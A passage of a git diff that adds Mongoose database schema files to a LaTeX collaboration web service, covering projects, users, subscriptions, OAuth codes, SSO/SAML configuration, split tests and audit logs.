require('../infrastructure/Mongoose') + +const { Schema } = mongoose +const { ObjectId } = Schema + +const OauthAuthorizationCodeSchema = new Schema( + { + authorizationCode: String, + expiresAt: Date, + oauthApplication_id: { type: ObjectId, ref: 'OauthApplication' }, + redirectUri: String, + scope: String, + user_id: { type: ObjectId, ref: 'User' }, + codeChallenge: String, + codeChallengeMethod: String, + }, + { + collection: 'oauthAuthorizationCodes', + minimize: false, + } +) + +exports.OauthAuthorizationCode = mongoose.model( + 'OauthAuthorizationCode', + OauthAuthorizationCodeSchema +) + +exports.OauthAuthorizationCodeSchema = OauthAuthorizationCodeSchema diff --git a/services/web/app/src/models/OnboardingDataCollection.js b/services/web/app/src/models/OnboardingDataCollection.js new file mode 100644 index 0000000..e0625f7 --- /dev/null +++ b/services/web/app/src/models/OnboardingDataCollection.js @@ -0,0 +1,33 @@ +const mongoose = require('../infrastructure/Mongoose') +const { Schema } = mongoose + +const OnboardingDataCollectionSchema = new Schema( + { + firstName: { type: String, default: 
null }, + lastName: { type: String, default: null }, + primaryOccupation: { type: String, default: null }, + usedLatex: { type: String, default: null }, + companyDivisionDepartment: { type: String, default: null }, + companyJobTitle: { type: String, default: null }, + governmentJobTitle: { type: String, default: null }, + institutionName: { type: String, default: null }, + otherJobTitle: { type: String, default: null }, + nonprofitDivisionDepartment: { type: String, default: null }, + nonprofitJobTitle: { type: String, default: null }, + role: { type: String, default: null }, + subjectArea: { type: String, default: null }, + updatedAt: { type: Date, default: Date.now }, + }, + { + collection: 'onboardingDataCollection', + minimize: false, + } +) + +module.exports = { + OnboardingDataCollection: mongoose.model( + 'OnboardingDataCollection', + OnboardingDataCollectionSchema + ), + OnboardingDataCollectionSchema, +} diff --git a/services/web/app/src/models/Project.js b/services/web/app/src/models/Project.js new file mode 100644 index 0000000..8da4b88 --- /dev/null +++ b/services/web/app/src/models/Project.js @@ -0,0 +1,143 @@ +const mongoose = require('../infrastructure/Mongoose') +const _ = require('lodash') +const { FolderSchema } = require('./Folder') +const Errors = require('../Features/Errors/Errors') + +const ConcreteObjectId = mongoose.Types.ObjectId +const { Schema } = mongoose +const { ObjectId } = Schema + +const DeletedDocSchema = new Schema({ + name: String, + deletedAt: { type: Date }, +}) + +const DeletedFileSchema = new Schema({ + name: String, + created: { + type: Date, + }, + linkedFileData: { type: Schema.Types.Mixed }, + hash: { + type: String, + }, + deletedAt: { type: Date }, +}) + +const ProjectSchema = new Schema( + { + name: { type: String, default: 'new project' }, + lastUpdated: { + type: Date, + default() { + return new Date() + }, + }, + lastUpdatedBy: { type: ObjectId, ref: 'User' }, + lastOpened: { type: Date }, + active: { type: Boolean, default: true }, + owner_ref: { type: ObjectId, ref: 'User' }, + collaberator_refs: [{ type: ObjectId, ref: 'User' }], + reviewer_refs: [{ type: ObjectId, ref: 'User' }], + readOnly_refs: [{ type: ObjectId, ref: 'User' }], + pendingEditor_refs: [{ type: ObjectId, ref: 'User' }], + pendingReviewer_refs: [{ type: ObjectId, ref: 'User' }], + rootDoc_id: { type: ObjectId }, + rootFolder: [FolderSchema], + mainBibliographyDoc_id: { type: ObjectId }, + version: { type: Number }, // incremented for every change in the project structure (folders and filenames) + publicAccesLevel: { type: String, default: 'private' }, + compiler: { type: String, default: 'pdflatex' }, + spellCheckLanguage: { type: String, default: 'en' }, + deletedByExternalDataSource: { type: Boolean, default: false }, + description: { type: String, default: '' }, + archived: { type: Schema.Types.Mixed }, + trashed: [{ type: ObjectId, ref: 'User' }], + deletedDocs: [DeletedDocSchema], + deletedFiles: [DeletedFileSchema], + imageName: { type: String }, + brandVariationId: { type: String }, + track_changes: { type: Object }, + tokens: { + readOnly: { + type: String, + index: { + unique: true, + partialFilterExpression: { 'tokens.readOnly': { $exists: true } }, + }, + }, + readAndWrite: { + type: String, + index: { + unique: true, + partialFilterExpression: { 'tokens.readAndWrite': { $exists: true } }, + }, + }, + readAndWritePrefix: { + type: String, + index: { + unique: true, + partialFilterExpression: { + 'tokens.readAndWritePrefix': { $exists: true }, + }, + }, + }, + 
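+      // Editor's note (sketch, not part of the commit): the three token
+      // fields above get unique indexes guarded by `partialFilterExpression`,
+      // so uniqueness is only enforced on documents that actually carry the
+      // token. The generated index is roughly equivalent to:
+      //   db.projects.createIndex(
+      //     { 'tokens.readOnly': 1 },
+      //     {
+      //       unique: true,
+      //       partialFilterExpression: { 'tokens.readOnly': { $exists: true } },
+      //     }
+      //   )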
}, + tokenAccessReadOnly_refs: [{ type: ObjectId, ref: 'User' }], + tokenAccessReadAndWrite_refs: [{ type: ObjectId, ref: 'User' }], + fromV1TemplateId: { type: Number }, + fromV1TemplateVersionId: { type: Number }, + overleaf: { + id: { type: Number }, + imported_at_ver_id: { type: Number }, + token: { type: String }, + read_token: { type: String }, + history: { + id: { type: Schema.Types.Mixed }, + display: { type: Boolean }, + upgradedAt: { type: Date }, + allowDowngrade: { type: Boolean }, + zipFileArchivedInProject: { type: Boolean }, + rangesSupportEnabled: { type: Boolean }, + }, + }, + collabratecUsers: [ + { + user_id: { type: ObjectId, ref: 'User' }, + collabratec_document_id: { type: String }, + collabratec_privategroup_id: { type: String }, + added_at: { + type: Date, + default() { + return new Date() + }, + }, + }, + ], + deferredTpdsFlushCounter: { type: Number }, + }, + { minimize: false } +) + +ProjectSchema.statics.getProject = function (projectOrId, fields, callback) { + if (projectOrId._id != null) { + callback(null, projectOrId) + } else { + try { + // eslint-disable-next-line no-new + new ConcreteObjectId(projectOrId.toString()) + } catch (e) { + return callback(new Errors.NotFoundError(e.message)) + } + this.findById(projectOrId, fields, callback) + } +} + +function applyToAllFilesRecursivly(folder, fun) { + _.forEach(folder.fileRefs, file => fun(file)) + _.forEach(folder.folders, folder => applyToAllFilesRecursivly(folder, fun)) +} +ProjectSchema.statics.applyToAllFilesRecursivly = applyToAllFilesRecursivly + +exports.Project = mongoose.model('Project', ProjectSchema) +exports.ProjectSchema = ProjectSchema diff --git a/services/web/app/src/models/ProjectAuditLogEntry.js b/services/web/app/src/models/ProjectAuditLogEntry.js new file mode 100644 index 0000000..fa13dbc --- /dev/null +++ b/services/web/app/src/models/ProjectAuditLogEntry.js @@ -0,0 +1,23 @@ +const mongoose = require('../infrastructure/Mongoose') +const { Schema } = mongoose + +const ProjectAuditLogEntrySchema = new Schema( + { + projectId: { type: Schema.Types.ObjectId, index: true }, + operation: { type: String }, + initiatorId: { type: Schema.Types.ObjectId }, + ipAddress: { type: String }, + timestamp: { type: Date, default: Date.now }, + info: { type: Object }, + }, + { + collection: 'projectAuditLogEntries', + minimize: false, + } +) + +exports.ProjectAuditLogEntry = mongoose.model( + 'ProjectAuditLogEntry', + ProjectAuditLogEntrySchema +) +exports.ProjectAuditLogEntrySchema = ProjectAuditLogEntrySchema diff --git a/services/web/app/src/models/ProjectHistoryFailure.js b/services/web/app/src/models/ProjectHistoryFailure.js new file mode 100644 index 0000000..7bfd1a3 --- /dev/null +++ b/services/web/app/src/models/ProjectHistoryFailure.js @@ -0,0 +1,24 @@ +const mongoose = require('../infrastructure/Mongoose') + +const { Schema } = mongoose + +const ProjectHistoryFailureSchema = new Schema( + { + project_id: String, + ts: Date, + queueSize: Number, + error: String, + stack: String, + attempts: Number, + history: Schema.Types.Mixed, + resyncStartedAt: Date, + resyncAttempts: Number, + requestCount: Number, + }, + { collection: 'projectHistoryFailures', minimize: false } +) + +exports.ProjectHistoryFailure = mongoose.model( + 'ProjectHistoryFailure', + ProjectHistoryFailureSchema +) diff --git a/services/web/app/src/models/ProjectInvite.js b/services/web/app/src/models/ProjectInvite.js new file mode 100644 index 0000000..a7bfbad --- /dev/null +++ b/services/web/app/src/models/ProjectInvite.js @@ -0,0 
+1,36 @@ +const mongoose = require('../infrastructure/Mongoose') + +const { Schema } = mongoose +const { ObjectId } = Schema + +const EXPIRY_IN_SECONDS = 60 * 60 * 24 * 30 + +const ExpiryDate = function () { + const timestamp = new Date() + timestamp.setSeconds(timestamp.getSeconds() + EXPIRY_IN_SECONDS) + return timestamp +} + +const ProjectInviteSchema = new Schema( + { + email: String, + tokenHmac: String, + sendingUserId: ObjectId, + projectId: ObjectId, + privileges: String, + createdAt: { type: Date, default: Date.now }, + expires: { + type: Date, + default: ExpiryDate, + index: { expireAfterSeconds: 10 }, + }, + }, + { + collection: 'projectInvites', + minimize: false, + } +) + +exports.ProjectInvite = mongoose.model('ProjectInvite', ProjectInviteSchema) +exports.ProjectInviteSchema = ProjectInviteSchema +exports.EXPIRY_IN_SECONDS = EXPIRY_IN_SECONDS diff --git a/services/web/app/src/models/Publisher.js b/services/web/app/src/models/Publisher.js new file mode 100644 index 0000000..e9e10e4 --- /dev/null +++ b/services/web/app/src/models/Publisher.js @@ -0,0 +1,50 @@ +const mongoose = require('../infrastructure/Mongoose') +const { Schema } = mongoose +const { ObjectId } = Schema +const settings = require('@overleaf/settings') +const logger = require('@overleaf/logger') +const request = require('request') + +const PublisherSchema = new Schema( + { + slug: { type: String, required: true }, + managerIds: [{ type: ObjectId, ref: 'User' }], + }, + { minimize: false } +) + +// fetch publisher's (brand on v1) data from v1 API. Errors are ignored +PublisherSchema.method('fetchV1Data', function (callback) { + request( + { + baseUrl: settings.apis.v1.url, + url: `/api/v2/brands/${this.slug}`, + method: 'GET', + auth: { + user: settings.apis.v1.user, + pass: settings.apis.v1.pass, + sendImmediately: true, + }, + timeout: settings.apis.v1.timeout, + }, + (error, response, body) => { + let parsedBody + try { + parsedBody = JSON.parse(body) + } catch (error1) { + // log error and carry on without v1 data + error = error1 + logger.err( + { model: 'Publisher', slug: this.slug, error }, + '[fetchV1DataError]' + ) + } + this.name = parsedBody != null ? parsedBody.name : undefined + this.partner = parsedBody != null ? 
parsedBody.partner : undefined + callback(null, this) + } + ) +}) + +exports.Publisher = mongoose.model('Publisher', PublisherSchema) +exports.PublisherSchema = PublisherSchema diff --git a/services/web/app/src/models/SSOConfig.js b/services/web/app/src/models/SSOConfig.js new file mode 100644 index 0000000..5d50d51 --- /dev/null +++ b/services/web/app/src/models/SSOConfig.js @@ -0,0 +1,22 @@ +const mongoose = require('../infrastructure/Mongoose') +const { Schema } = mongoose + +const SSOConfigSchema = new Schema( + { + entryPoint: { type: String, required: true }, + certificates: { type: Array, default: [''], required: true }, + userIdAttribute: { type: String, required: true }, + userFirstNameAttribute: { type: String }, + userLastNameAttribute: { type: String }, + validated: { type: Boolean, default: false }, + enabled: { type: Boolean, default: false }, + }, + + { + collection: 'ssoConfigs', + minimize: false, + } +) + +exports.SSOConfig = mongoose.model('SSOConfig', SSOConfigSchema) +exports.SSOConfigSchema = SSOConfigSchema diff --git a/services/web/app/src/models/SamlCache.js b/services/web/app/src/models/SamlCache.js new file mode 100644 index 0000000..185fe61 --- /dev/null +++ b/services/web/app/src/models/SamlCache.js @@ -0,0 +1,16 @@ +const mongoose = require('../infrastructure/Mongoose') +const { Schema } = mongoose + +const SamlCacheSchema = new Schema( + { + createdAt: { type: Date }, + requestId: { type: String }, + }, + { + collection: 'samlCache', + minimize: false, + } +) + +exports.SamlCache = mongoose.model('SamlCache', SamlCacheSchema) +exports.SamlCacheSchema = SamlCacheSchema diff --git a/services/web/app/src/models/SamlLog.js b/services/web/app/src/models/SamlLog.js new file mode 100644 index 0000000..5288977 --- /dev/null +++ b/services/web/app/src/models/SamlLog.js @@ -0,0 +1,22 @@ +const mongoose = require('../infrastructure/Mongoose') +const { Schema } = mongoose + +const SamlLogSchema = new Schema( + { + createdAt: { type: Date, default: () => new Date() }, + data: { type: Object }, + jsonData: { type: String }, + path: { type: String }, + providerId: { type: String, default: '' }, + samlAssertion: { type: String }, + sessionId: { type: String, default: '' }, + userId: { type: String, default: '' }, + }, + { + collection: 'samlLogs', + minimize: false, + } +) + +exports.SamlLog = mongoose.model('SamlLog', SamlLogSchema) +exports.SamlLogSchema = SamlLogSchema diff --git a/services/web/app/src/models/ScriptLog.mjs b/services/web/app/src/models/ScriptLog.mjs new file mode 100644 index 0000000..9cc6b86 --- /dev/null +++ b/services/web/app/src/models/ScriptLog.mjs @@ -0,0 +1,27 @@ +import Mongoose from '../infrastructure/Mongoose.js' + +export const ScriptLogSchema = new Mongoose.Schema( + { + canonicalName: { type: String, required: true }, + filePathAtVersion: { type: String, required: true }, + imageVersion: { type: String, required: true }, + podName: { type: String, required: true }, + startTime: { type: Date, default: Date.now }, + endTime: { type: Date, default: null }, + username: { type: String, required: true }, + status: { + type: String, + enum: ['pending', 'success', 'error'], + default: 'pending', + required: true, + }, + vars: { type: Object, required: true }, + progressLogs: { + type: [{ timestamp: Date, message: String }], + required: true, + }, + }, + { minimize: false, collection: 'scriptLogs' } +) + +export const ScriptLog = Mongoose.model('ScriptLog', ScriptLogSchema) diff --git a/services/web/app/src/models/SplitTest.js 
b/services/web/app/src/models/SplitTest.js new file mode 100644 index 0000000..2168db4 --- /dev/null +++ b/services/web/app/src/models/SplitTest.js @@ -0,0 +1,174 @@ +const mongoose = require('../infrastructure/Mongoose') +const { Schema } = mongoose +const { ObjectId } = Schema + +const MIN_NAME_LENGTH = 3 +const MAX_NAME_LENGTH = 200 +const MIN_VARIANT_NAME_LENGTH = 3 +const MAX_VARIANT_NAME_LENGTH = 255 +const NAME_REGEX = /^[a-z0-9-]+$/ + +const RolloutPercentType = { + type: Number, + default: 0, + min: [0, 'Rollout percentage must be between 0 and 100, got {VALUE}'], + max: [100, 'Rollout percentage must be between 0 and 100, got {VALUE}'], + required: true, +} + +const BadgeSchema = new Schema( + { + tooltipText: { + type: String, + required: false, + }, + url: { + type: String, + required: false, + }, + }, + { _id: false } +) + +const BadgeInfoSchema = new Schema( + { + alpha: BadgeSchema, + beta: BadgeSchema, + release: BadgeSchema, + }, + { _id: false } +) + +const VariantSchema = new Schema( + { + name: { + type: String, + minLength: MIN_VARIANT_NAME_LENGTH, + maxLength: MAX_VARIANT_NAME_LENGTH, + required: true, + validate: { + validator: function (input) { + return input !== null && input !== 'default' && NAME_REGEX.test(input) + }, + message: `invalid, cannot be 'default' and must match: ${NAME_REGEX}, got {VALUE}`, + }, + }, + rolloutPercent: RolloutPercentType, + rolloutStripes: [ + { + start: RolloutPercentType, + end: RolloutPercentType, + }, + ], + }, + { _id: false } +) + +const VersionSchema = new Schema( + { + versionNumber: { + type: Number, + default: 1, + min: [1, 'must be 1 or higher, got {VALUE}'], + required: true, + }, + phase: { + type: String, + default: 'alpha', + enum: ['alpha', 'beta', 'release'], + required: true, + }, + active: { + type: Boolean, + default: true, + required: true, + }, + analyticsEnabled: { + type: Boolean, + default: true, + required: true, + }, + variants: [VariantSchema], + createdAt: { + type: Date, + default: Date.now, + }, + author: { type: ObjectId, ref: 'User' }, + comment: { + type: String, + required: false, + }, + }, + { _id: false } +) + +const SplitTestSchema = new Schema( + { + name: { + type: String, + minLength: MIN_NAME_LENGTH, + maxlength: MAX_NAME_LENGTH, + required: true, + unique: true, + validate: { + validator: function (input) { + return input !== null && NAME_REGEX.test(input) + }, + message: `invalid, must match: ${NAME_REGEX}`, + }, + }, + versions: [VersionSchema], + forbidReleasePhase: { + type: Boolean, + required: false, + }, + description: { + type: String, + required: false, + }, + expectedEndDate: { + type: Date, + required: false, + }, + requiredCohortSize: { + type: Number, + required: false, + }, + expectedUplift: { + type: Number, + required: false, + }, + ticketUrl: { + type: String, + required: false, + }, + reportsUrls: { + type: [String], + required: false, + default: [], + }, + winningVariant: { + type: String, + required: false, + }, + archived: { + type: Boolean, + required: false, + }, + archivedAt: { + type: Date, + required: false, + }, + archivedBy: { type: ObjectId, ref: 'User' }, + badgeInfo: { + type: BadgeInfoSchema, + required: false, + }, + }, + { minimize: false } +) + +module.exports = { + SplitTest: mongoose.model('SplitTest', SplitTestSchema), + SplitTestSchema, +} diff --git a/services/web/app/src/models/Subscription.js b/services/web/app/src/models/Subscription.js new file mode 100644 index 0000000..0145eb6 --- /dev/null +++ b/services/web/app/src/models/Subscription.js @@ -0,0 
+1,102 @@ +const mongoose = require('../infrastructure/Mongoose') +const { TeamInviteSchema } = require('./TeamInvite') + +const { Schema } = mongoose +const { ObjectId } = Schema + +const SubscriptionSchema = new Schema( + { + admin_id: { + type: ObjectId, + ref: 'User', + index: { unique: true, dropDups: true }, + }, + manager_ids: { + type: [ObjectId], + ref: 'User', + required: true, + validate: function (managers) { + // require at least one manager + return !!managers.length + }, + }, + member_ids: [{ type: ObjectId, ref: 'User' }], + groupPolicy: { type: ObjectId, ref: 'GroupPolicy' }, + invited_emails: [String], + teamInvites: [TeamInviteSchema], + recurlySubscription_id: String, + teamName: { type: String }, + teamNotice: { type: String }, + planCode: { type: String }, + groupPlan: { type: Boolean, default: false }, + managedUsersEnabled: { type: Boolean, default: false }, + membersLimit: { type: Number, default: 0 }, + customAccount: Boolean, + features: { + managedUsers: { type: Boolean, default: true }, + groupSSO: { type: Boolean, default: true }, + }, + addOns: Schema.Types.Mixed, + overleaf: { + id: { + type: Number, + index: { + unique: true, + partialFilterExpression: { 'overleaf.id': { $exists: true } }, + }, + }, + }, + recurlyStatus: { + state: { + type: String, + }, + trialStartedAt: { + type: Date, + }, + trialEndsAt: { + type: Date, + }, + }, + paymentProvider: { + service: { + type: String, + }, + subscriptionId: { + type: String, + }, + }, + collectionMethod: { + type: String, + enum: ['automatic', 'manual'], + default: 'automatic', + }, + v1_id: { + type: Number, + required: false, + min: 1, + }, + salesforce_id: { + type: String, + required: false, + validate: { + validator: function (salesforceId) { + return ( + salesforceId == null || + salesforceId === '' || + salesforceId.match(/^(?:[A-Za-z0-9]{15}|[A-Za-z0-9]{18})$/) + ) + }, + }, + }, + ssoConfig: { type: ObjectId, ref: 'SSOConfig' }, + }, + { minimize: false } +) + +// Subscriptions have no v1 data to fetch +SubscriptionSchema.method('fetchV1Data', function (callback) { + callback(null, this) +}) + +exports.Subscription = mongoose.model('Subscription', SubscriptionSchema) +exports.SubscriptionSchema = SubscriptionSchema diff --git a/services/web/app/src/models/Survey.js b/services/web/app/src/models/Survey.js new file mode 100644 index 0000000..5d56a20 --- /dev/null +++ b/services/web/app/src/models/Survey.js @@ -0,0 +1,54 @@ +const mongoose = require('../infrastructure/Mongoose') +const { Schema } = mongoose + +const MIN_NAME_LENGTH = 3 +const MAX_NAME_LENGTH = 200 +const NAME_REGEX = /^[a-z0-9-]+$/ + +const SurveySchema = new Schema( + { + name: { + type: String, + minLength: MIN_NAME_LENGTH, + maxlength: MAX_NAME_LENGTH, + required: true, + validate: { + validator: function (input) { + return input !== null && NAME_REGEX.test(input) + }, + message: `invalid, must match: ${NAME_REGEX}`, + }, + }, + preText: { + type: String, + required: true, + }, + linkText: { + type: String, + required: true, + }, + url: { + type: String, + required: true, + }, + options: { + hasRecurlyGroupSubscription: { + type: Boolean, + default: false, + }, + rolloutPercentage: { + type: Number, + default: 100, + }, + }, + }, + { + collection: 'surveys', + minimize: false, + } +) + +module.exports = { + Survey: mongoose.model('Survey', SurveySchema), + SurveySchema, +} diff --git a/services/web/app/src/models/SystemMessage.js b/services/web/app/src/models/SystemMessage.js new file mode 100644 index 0000000..c3e37d0 --- /dev/null 
+++ b/services/web/app/src/models/SystemMessage.js @@ -0,0 +1,12 @@ +const mongoose = require('../infrastructure/Mongoose') + +const { Schema } = mongoose + +const SystemMessageSchema = new Schema( + { + content: { type: String, default: '' }, + }, + { minimize: false } +) + +exports.SystemMessage = mongoose.model('SystemMessage', SystemMessageSchema) diff --git a/services/web/app/src/models/Tag.js b/services/web/app/src/models/Tag.js new file mode 100644 index 0000000..8e0eb11 --- /dev/null +++ b/services/web/app/src/models/Tag.js @@ -0,0 +1,28 @@ +const mongoose = require('../infrastructure/Mongoose') +const { Schema } = mongoose + +const COLOR_REGEX = /^#[a-fA-F0-9]{6}$/ + +// Note that for legacy reasons, user_id and project_ids are plain strings, +// not ObjectIds. + +const TagSchema = new Schema( + { + user_id: { type: String, required: true }, + name: { type: String, required: true }, + color: { + type: String, + validate: { + validator: function (v) { + return !v || COLOR_REGEX.test(v) + }, + message: 'Provided color code is invalid.', + }, + }, + project_ids: [String], + }, + { minimize: false } +) + +exports.Tag = mongoose.model('Tag', TagSchema) +exports.TagSchema = TagSchema diff --git a/services/web/app/src/models/TeamInvite.js b/services/web/app/src/models/TeamInvite.js new file mode 100644 index 0000000..b115d27 --- /dev/null +++ b/services/web/app/src/models/TeamInvite.js @@ -0,0 +1,16 @@ +const mongoose = require('../infrastructure/Mongoose') + +const { Schema } = mongoose + +const TeamInviteSchema = new Schema( + { + email: { type: String, required: true }, + token: { type: String }, + inviterName: { type: String }, + sentAt: { type: Date }, + }, + { minimize: false } +) + +exports.TeamInvite = mongoose.model('TeamInvite', TeamInviteSchema) +exports.TeamInviteSchema = TeamInviteSchema diff --git a/services/web/app/src/models/User.js b/services/web/app/src/models/User.js new file mode 100644 index 0000000..c63647e --- /dev/null +++ b/services/web/app/src/models/User.js @@ -0,0 +1,245 @@ +const Settings = require('@overleaf/settings') +const mongoose = require('../infrastructure/Mongoose') +const TokenGenerator = require('../Features/TokenGenerator/TokenGenerator') +const { Schema } = mongoose +const { ObjectId } = Schema + +// See https://stackoverflow.com/questions/386294/what-is-the-maximum-length-of-a-valid-email-address/574698#574698 +const MAX_EMAIL_LENGTH = 254 +const MAX_NAME_LENGTH = 255 + +const UserSchema = new Schema( + { + email: { type: String, default: '', maxlength: MAX_EMAIL_LENGTH }, + emails: [ + { + email: { type: String, default: '', maxlength: MAX_EMAIL_LENGTH }, + reversedHostname: { type: String, default: '' }, + createdAt: { + type: Date, + default() { + return new Date() + }, + }, + confirmedAt: { type: Date }, + samlProviderId: { type: String }, + affiliationUnchecked: { type: Boolean }, + reconfirmedAt: { type: Date }, + }, + ], + first_name: { + type: String, + default: '', + maxlength: MAX_NAME_LENGTH, + }, + last_name: { + type: String, + default: '', + maxlength: MAX_NAME_LENGTH, + }, + role: { type: String, default: '' }, + institution: { type: String, default: '' }, + hashedPassword: String, + enrollment: { + sso: [ + { + groupId: { + type: ObjectId, + ref: 'Subscription', + }, + linkedAt: Date, + primary: { type: Boolean, default: false }, + }, + ], + managedBy: { + type: ObjectId, + ref: 'Subscription', + }, + enrolledAt: { type: Date }, + }, + isAdmin: { type: Boolean, default: false }, + staffAccess: { + publisherMetrics: { type: 
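A quick illustration of the Tag color rule above: only six-digit hex codes pass, and an unset color is allowed because the validator short-circuits on falsy input.

const COLOR_REGEX = /^#[a-fA-F0-9]{6}$/
const isValidColor = v => !v || COLOR_REGEX.test(v)

console.log(isValidColor('#A1B2C3')) // true
console.log(isValidColor('#fff')) // false: shorthand hex is rejected
console.log(isValidColor(undefined)) // true: color is optional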
Boolean, default: false }, + publisherManagement: { type: Boolean, default: false }, + institutionMetrics: { type: Boolean, default: false }, + institutionManagement: { type: Boolean, default: false }, + groupMetrics: { type: Boolean, default: false }, + groupManagement: { type: Boolean, default: false }, + adminMetrics: { type: Boolean, default: false }, + splitTestMetrics: { type: Boolean, default: false }, + splitTestManagement: { type: Boolean, default: false }, + }, + signUpDate: { + type: Date, + default() { + return new Date() + }, + }, + loginEpoch: { type: Number }, + lastActive: { type: Date }, + lastFailedLogin: { type: Date }, + lastLoggedIn: { type: Date }, + lastLoginIp: { type: String, default: '' }, + lastPrimaryEmailCheck: { type: Date }, + lastTrial: { type: Date }, + loginCount: { type: Number, default: 0 }, + holdingAccount: { type: Boolean, default: false }, + ace: { + mode: { type: String, default: 'none' }, + theme: { type: String, default: 'textmate' }, + overallTheme: { type: String, default: '' }, + fontSize: { type: Number, default: '12' }, + autoComplete: { type: Boolean, default: true }, + autoPairDelimiters: { type: Boolean, default: true }, + spellCheckLanguage: { type: String, default: 'en' }, + pdfViewer: { type: String, default: 'pdfjs' }, + syntaxValidation: { type: Boolean }, + fontFamily: { type: String }, + lineHeight: { type: String }, + mathPreview: { type: Boolean, default: true }, + referencesSearchMode: { type: String, default: 'advanced' }, // 'advanced' or 'simple' + enableNewEditor: { type: Boolean }, + }, + features: { + collaborators: { + type: Number, + default: Settings.defaultFeatures.collaborators, + }, + versioning: { + type: Boolean, + default: Settings.defaultFeatures.versioning, + }, + dropbox: { type: Boolean, default: Settings.defaultFeatures.dropbox }, + github: { type: Boolean, default: Settings.defaultFeatures.github }, + gitBridge: { type: Boolean, default: Settings.defaultFeatures.gitBridge }, + compileTimeout: { + type: Number, + default: Settings.defaultFeatures.compileTimeout, + }, + compileGroup: { + type: String, + default: Settings.defaultFeatures.compileGroup, + }, + references: { + type: Boolean, + default: Settings.defaultFeatures.references, + }, + trackChanges: { + type: Boolean, + default: Settings.defaultFeatures.trackChanges, + }, + mendeley: { type: Boolean, default: Settings.defaultFeatures.mendeley }, + zotero: { type: Boolean, default: Settings.defaultFeatures.zotero }, + papers: { type: Boolean, default: Settings.defaultFeatures.papers }, + referencesSearch: { + type: Boolean, + default: Settings.defaultFeatures.referencesSearch, + }, + symbolPalette: { + type: Boolean, + default: Settings.defaultFeatures.symbolPalette, + }, + aiErrorAssistant: { + type: Boolean, + default: false, + }, + }, + featuresOverrides: [ + { + createdAt: { + type: Date, + default() { + return new Date() + }, + }, + expiresAt: { type: Date }, + note: { type: String }, + features: { + aiErrorAssistant: { type: Boolean }, + collaborators: { type: Number }, + versioning: { type: Boolean }, + dropbox: { type: Boolean }, + github: { type: Boolean }, + gitBridge: { type: Boolean }, + compileTimeout: { type: Number }, + compileGroup: { type: String }, + templates: { type: Boolean }, + trackChanges: { type: Boolean }, + mendeley: { type: Boolean }, + papers: { type: Boolean }, + zotero: { type: Boolean }, + referencesSearch: { type: Boolean }, + symbolPalette: { type: Boolean }, + }, + }, + ], + featuresUpdatedAt: { type: Date }, + 
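Each featuresOverrides entry above pairs a features patch with an optional expiresAt. The merge logic itself lives elsewhere in web; the sketch below is only a plausible reading of the data shape, and every name in it is hypothetical:

function applyOverrides(features, overrides, now = new Date()) {
  for (const override of overrides) {
    if (override.expiresAt && override.expiresAt < now) continue // expired: ignore
    Object.assign(features, override.features) // later overrides win
  }
  return features
}

console.log(
  applyOverrides(
    { collaborators: 1, versioning: false },
    [{ expiresAt: new Date(Date.now() + 86400000), features: { versioning: true } }]
  )
) // { collaborators: 1, versioning: true }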
featuresEpoch: { + type: String, + }, + must_reconfirm: { type: Boolean, default: false }, + referal_id: { + type: String, + default() { + return TokenGenerator.generateReferralId() + }, + }, + refered_users: [{ type: ObjectId, ref: 'User' }], + refered_user_count: { type: Number, default: 0 }, + refProviders: { + // The actual values are managed by third-party-references. + mendeley: Schema.Types.Mixed, + zotero: Schema.Types.Mixed, + papers: Schema.Types.Mixed, + }, + writefull: { + enabled: { type: Boolean, default: null }, + autoCreatedAccount: { type: Boolean, default: false }, + isPremium: { type: Boolean, default: false }, + }, + aiErrorAssistant: { + enabled: { type: Boolean, default: true }, + }, + alphaProgram: { type: Boolean, default: false }, // experimental features + betaProgram: { type: Boolean, default: false }, + labsProgram: { type: Boolean, default: false }, + labsExperiments: { type: Array, default: [] }, + overleaf: { + id: { type: Number }, + accessToken: { type: String }, + refreshToken: { type: String }, + }, + awareOfV2: { type: Boolean, default: false }, + samlIdentifiers: { type: Array, default: [] }, + thirdPartyIdentifiers: { type: Array, default: [] }, + migratedAt: { type: Date }, + twoFactorAuthentication: { + createdAt: { type: Date }, + enrolledAt: { type: Date }, + secretEncrypted: { type: String }, + }, + onboardingEmailSentAt: { type: Date }, + splitTests: Schema.Types.Mixed, + analyticsId: { type: String }, + completedTutorials: Schema.Types.Mixed, + suspended: { type: Boolean }, + }, + { minimize: false } +) + +function formatSplitTestsSchema(next) { + if (this.splitTests) { + for (const splitTestKey of Object.keys(this.splitTests)) { + for (const variantIndex in this.splitTests[splitTestKey]) { + this.splitTests[splitTestKey][variantIndex].assignedAt = new Date( + this.splitTests[splitTestKey][variantIndex].assignedAt + ) + } + } + } + next() +} +UserSchema.pre('save', formatSplitTestsSchema) + +exports.User = mongoose.model('User', UserSchema) +exports.UserSchema = UserSchema diff --git a/services/web/app/src/models/UserAuditLogEntry.js b/services/web/app/src/models/UserAuditLogEntry.js new file mode 100644 index 0000000..c4355d2 --- /dev/null +++ b/services/web/app/src/models/UserAuditLogEntry.js @@ -0,0 +1,23 @@ +const mongoose = require('../infrastructure/Mongoose') +const { Schema } = mongoose + +const UserAuditLogEntrySchema = new Schema( + { + userId: { type: Schema.Types.ObjectId, index: true }, + info: { type: Object }, + initiatorId: { type: Schema.Types.ObjectId }, + ipAddress: { type: String }, + operation: { type: String }, + timestamp: { type: Date, default: Date.now }, + }, + { + collection: 'userAuditLogEntries', + minimize: false, + } +) + +exports.UserAuditLogEntry = mongoose.model( + 'UserAuditLogEntry', + UserAuditLogEntrySchema +) +exports.UserAuditLogEntrySchema = UserAuditLogEntrySchema diff --git a/services/web/app/src/models/UserFeatureUsage.js b/services/web/app/src/models/UserFeatureUsage.js new file mode 100644 index 0000000..9ba2848 --- /dev/null +++ b/services/web/app/src/models/UserFeatureUsage.js @@ -0,0 +1,20 @@ +const mongoose = require('../infrastructure/Mongoose') +const { Schema } = mongoose + +const Usage = new Schema({ + usage: { type: Number }, + periodStart: { type: Date }, +}) + +const UserFeatureUsageSchema = new Schema({ + features: { + aiErrorAssistant: Usage, + }, +}) + +exports.UserFeatureUsage = mongoose.model( + 'UserFeatureUsage', + UserFeatureUsageSchema +) + +exports.UserFeatureUsageSchema = 
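The pre('save') hook above (formatSplitTestsSchema) normalises every assignedAt value to a Date object before the user document is persisted. A standalone restatement with sample data (field names in the sample are illustrative):

function formatSplitTests(splitTests) {
  // Coerce every assignedAt to a Date, mirroring the pre-save hook above.
  for (const key of Object.keys(splitTests || {})) {
    for (const assignment of splitTests[key]) {
      assignment.assignedAt = new Date(assignment.assignedAt)
    }
  }
  return splitTests
}

const splitTests = formatSplitTests({
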